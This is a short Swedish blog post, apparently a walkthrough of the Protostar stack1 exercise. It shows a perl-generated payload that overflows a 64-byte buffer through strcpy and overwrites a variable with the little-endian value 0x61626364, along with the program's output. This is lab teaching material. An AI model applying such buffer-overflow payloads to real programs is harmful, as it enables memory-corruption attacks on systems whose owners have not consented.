Protostar och stack1

Stack1

Och här ska vi ändra så att if(modified == 0x61626364) {
Och nu är modified 0
Finns en strcpy så vi kan skriva mer till buffer än 64 tecken som den max ska ha.

Så om vi testar
user@protostar:/opt/protostar/bin$ ./stack1 $(perl -e ‘print ”a”x64′)
Try again, you got 0x00000000

Ok då ska vi se till att modified blir 0x61626364

user@protostar:/opt/protostar/bin$ ./stack1 $(perl -e ‘print ”a”x64 . ”\x64\x63\x62\x61″‘)
you have correctly got the variable to the right value

Och eftersom det är en Intel med little endian så får vi skriva 0x61626364 baklänges. Och då blir det \x64\x63\x62\x61

Simpelt hittentills, men i nebula så ökade de svårighetsgraden nästan direkt.

Det här inlägget postades i Okategoriserade. Bokmärk permalänken.

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *


*

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>